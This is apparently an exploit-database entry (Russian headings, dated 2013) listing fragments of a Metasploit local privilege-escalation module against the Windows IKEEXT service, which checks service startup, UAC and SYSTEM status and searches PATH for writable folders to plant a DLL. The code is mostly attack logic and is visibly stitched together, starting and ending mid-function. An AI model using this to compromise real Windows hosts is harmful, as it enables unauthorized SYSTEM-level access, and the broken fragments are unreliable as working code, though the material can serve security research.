Свойства

Дата публикации:

09.09.2013

Цель:

IKE and AuthIP Keyring Modules

Тип воздействия:

Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

if srv_info.nil?
print_warning("Unable to enumerate services.")
return false
end

if srv_info && srv_info['Name'].empty?
print_warning("Service #{service} does not exist.")
return false
else
return true
end
end

def check
srv_info = service_info(@service_name)

if !check_service_exists?(@service_name)
return Exploit::CheckCode::Safe
end

vprint_status(srv_info.to_s)

case srv_info['Startup']
when 'Disabled'
print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Manual'
print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
return Exploit::CheckCode::Safe
when 'Auto'
print_good("Service is set to Automatically start...")
end

paths.each do |p|
path = expand_path(p)
if exist?(path)
if check_write_access(path)
return path
end
else
# User may be able to create the path...
print_status("Path #{path} does not exist...")
@non_existant_dirs << path
end
end

if is_system?
fail_with(Exploit::Failure::Unknown, "Current user is already SYSTEM, aborting.")
end

print_status("Checking service exists...")
if !check_service_exists?(@service_name)
fail_with(Exploit::Failure::NoTarget, "The service doesn't exist.")
end

if is_uac_enabled?
print_warning("UAC is enabled, may get false negatives on writable folders.")
end

if datastore['DIR'].empty?
# If DLL already exists in system folders, we dont want to overwrite by accident
if check_search_path
fail_with(Exploit::Failure::NotVulnerable, "DLL already exists in system folders.")
end

file_path = check_system_path
file_path ||= check_dirs # If no paths are writable check to see if we can create any of the non-existant dirs

if file_path.nil?
fail_with(Exploit::Failure::NotVulnerable, "Unable to write to any folders in the PATH, aborting...")
end
else
# Use manually selected Dir
file_path = datastore['DIR']
end